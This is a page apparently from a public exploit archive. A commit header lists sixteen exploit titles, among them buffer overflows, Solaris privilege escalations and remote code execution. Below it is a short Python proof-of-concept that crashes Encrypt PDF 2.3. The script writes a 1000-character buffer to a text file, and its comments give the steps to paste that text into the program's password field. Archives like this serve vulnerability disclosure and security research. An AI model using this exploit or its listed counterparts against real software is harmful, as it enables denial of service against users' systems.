
16 changes to exploits/shellcodes Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode) Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow Encrypt PDF 2.3 - Denial of Service (PoC) PCL Converter 2.7 - Denial of Service (PoC) docPrint Pro 8.0 - Denial of Service (PoC) AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC) BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC) BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC) xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation Huawei eSpace 1.1.11.103 - DLL Hijacking Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit) eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution Linux x86_64 - Delete File Shellcode (28 bytes)
21 lines
No EOL
779 B
Python
Executable file
21 lines
No EOL
779 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: Encrypt PDF v2.3 - Denial of Service (PoC)
|
|
# Date: 19/05/2019
|
|
# Author: Alejandra Sánchez
|
|
# Vendor Homepage: http://www.verypdf.com
|
|
# Software: http://www.verypdf.com/encryptpdf/encryptpdf.exe
|
|
# Version: 2.3
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# 1.- Run the python script "EncryptPDF.py", it will create a new file "EncryptPDF.txt"
|
|
# 2.- Copy the text from the generated EncryptPDF.txt file to clipboard
|
|
# 3.- Open Encrypt PDF v2.3
|
|
# 4.- Go to 'Setting', paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
|
|
# 5.- Click on 'Open PDF(s)', when you import a pdf file, you will see a crash
|
|
|
|
buffer = "\x41" * 1000
|
|
|
|
f = open ("EncryptPDF.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |